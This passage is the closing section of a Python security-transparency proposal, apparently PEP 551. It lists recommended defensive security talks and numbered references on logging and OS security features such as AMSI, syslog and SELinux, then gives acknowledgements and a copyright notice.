     By Aviv Raff for SecurityWeek, 8th May 2014

     High-level summary of the value of detailed logging and automatic 


**No Easy Breach: Challenges and Lessons Learned from an Epic Investigation**
     Video presented by Matt Dunwoody and Nick Carr for Mandiant at
     ShmooCon 2016

     Detailed walkthrough of the processes and tools used in detecting and
     removing an APT.


**Disrupting Nation State Hackers**
     Video presented by Rob Joyce for the NSA at USENIX Enigma 2016

     Good security practices, capabilities and recommendations from the chief
     of NSA's Tailored Access Operations.



.. [1] Assume Breach Mindset, `<http://asian-power.com/node/11144>`_

.. [2] PowerShell Loves the Blue Team, also known as Scripting Security and
    Protection Advances in Windows 10, 

.. [3] 

.. [4] `<https://aka.ms/deviceguard>`_

.. [5] AMSI, 

.. [6] Persistent Zone Identifiers, 

.. [7] Event tracing, 

.. [8] `<https://www.gnupg.org/>`_

.. [9] `<https://www.systutorials.com/docs/linux/man/3-sd_journal_send/>`_

.. [10] `<http://www.trustedbsd.org/openbsm.html>`_

.. [11] `<https://linux.die.net/man/3/syslog>`_

.. [12] 

.. [13] SELinux access decisions 


Thanks to all the people from Microsoft involved in helping make the Python
runtime safer for production use, and especially to James Powell for doing
much of the initial research, analysis and implementation, Lee Holmes for
insights into the info-sec field and PowerShell's responses, and Brett
for the grounding discussions.


Copyright (c) 2017 by Microsoft Corporation. This material may be distributed
only subject to the terms and conditions set forth in the Open Publication
License, v1.0 or later (the latest version is presently available at
